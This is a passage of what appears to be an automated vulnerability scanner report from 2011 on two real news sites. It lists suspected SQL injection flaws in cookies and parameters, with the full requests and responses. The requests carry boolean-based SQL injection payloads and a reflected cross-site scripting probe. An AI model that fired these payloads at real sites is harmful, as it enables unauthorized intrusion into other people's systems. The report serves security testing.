{"history":true,"resp":15,"url":"vcloud_express.cfm","query":"","name":"vcloud_express","title":"vCloud Express Public Cloud Offering- Cloud Hosting | Cloud Servers | Managed Cloud Hosting | Managed C
...[SNIP]...

1.4. http://www.intranetjournal.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 27357565'%20or%201%3d1--%20 and 27357565'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)27357565'%20or%201%3d1--%20; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:52:07 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:53:07 GMT
Content-Type: text/html
Content-Length: 149349


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1242120994;u=j;z=20110218115207" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includ
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)27357565'%20or%201%3d2--%20; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:52:08 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:53:08 GMT
Content-Type: text/html
Content-Length: 149339


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=462930559;u=j;z=20110218115208" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=462930559;u=j;z=20110218115208" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

1.5. http://www.intranetjournal.com/ [c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter appears to be vulnerable to SQL injection attacks. The payloads 60248758'%20or%201%3d1--%20 and 60248758'%20or%201%3d2--%20 were each submitted in the c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=160248758'%20or%201%3d1--%20 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:49:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:50:54 GMT
Content-Type: text/html
Content-Length: 149480


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=243729054;u=j;z=20110218114954" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=160248758'%20or%201%3d2--%20 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1; qsg=14508; __utmz=167246694.1298042932.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298035735007:ss=1298035735007; __utma=167246694.598188733.1298042932.1298042932.1298042932.1; __utmc=167246694; __utmb=167246694.2.10.1298042932

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:49:54 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:50:54 GMT
Content-Type: text/html
Content-Length: 149490


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=932006327;u=j;z=20110218114954" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=932006327;u=j;z=20110218114954" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes
...[SNIP]...

1.6. http://www.intranetjournal.com/ [intmintc__welcome; toURL cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.intranetjournal.com
Path:   /

Issue detail

The cookie reported here as "intmintc__welcome; toURL" appears to be vulnerable to SQL injection attacks. The odd name comes from the scanner's parsing of the Cookie header, in which the valueless cookie intmintc__welcome precedes toURL; in the requests below the payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 are appended to the toURL value. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1'%20and%201%3d1--%20; qsg=14508

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:53:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:54:06 GMT
Content-Type: text/html
Content-Length: 149341


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1000379096;u=j;z=20110218115306" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_include
...[SNIP]...

Request 2

GET /?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1 HTTP/1.1
Host: www.intranetjournal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.intranetjournal.com/%3Fc5d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E177b53bcb4%3D1'%20and%201%3d2--%20; qsg=14508

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:53:07 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 16:54:07 GMT
Content-Type: text/html
Content-Length: 149353


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<!-- test -->
<link href="http://www.intranetjournal.com/feed.xml" rel="alternate" type="application/rss+xml" title="Intranet Jou
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1284103644;u=j;z=20110218115308" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661113/661095/661075/581331/581034;s=9539;x=7936;f=1284103644;u=j;z=20110218115308" alt="Click here"></a>
</noscript>
</span>

<div class="KonaFilter">
<!------ OAS AD 'house_ribbon' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('house_ribbon');
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="http://63.236.18.118/RealMedia/ads/click_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" >
<IMG SRC="http://63.236.18.118/RealMedia/ads/adstream_nx.ads/intm/it/www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/index@125x125-1,120x60-1,flex,468x60-1,accessunit,accessunit_one,accessunit_three,accessunit_two,ciu,336x280-2,house_ribbon,send,cp1,cp2,cp3,cp4,cp5,cp6,cp7,cp8,cp9,cp10,cp11,cp12,cp13,cp14!house_ribbon" border=0>
</A>
</NOSCRIPT>
<!------ OAS AD 'house_ribbon' end ------>
</div>


<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_include
...[SNIP]...

1.7. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.isp-planet.com
Path:   /about/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /about/sitemap.html?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:29 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 66508


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
<META name="description" content="ISP-Planet has business and marketing advice for ISPs, plus specialized isp information resources. It reports on IS
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695826/641338/581996/581034;s=9538;x=3584;f=1175618564;u=j;z=20110218123029" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644262/641338/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1189705527;u=j;z=20110218123029" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644262/641338/581996/581034;s=9538;x=15104;f=1189705527;u=j;z=20110218123029" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>

</center>
</td> </TR>
<TR>
<TD width="20%" valign="TOP">
<CENTER>
&nbsp;<A href="http://www.internet.com/"><IMG src="/img/icom-logo-micro.gif" width="130" height="28" border="0" alt="Internet.com"></A><BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /about/sitemap.html?1'%20and%201%3d1--%20=1 --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641865/641338/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=1153674472;u=j;z=20110218123029" target="_blank">
<img border="0" width="125" height="125" src="http://o1.qnsr.com/cgi/x?;n=203;c=641865/641338/581996/581034;s=9538;x=1536;f=11536
...[SNIP]...

Request 2

GET /about/sitemap.html?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:30:30 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:31:30 GMT
Connection: close
Content-Type: text/html
Content-Length: 66498


<HTML>
<HEAD>
<TITLE>ISP-Planet - Welcome</TITLE>
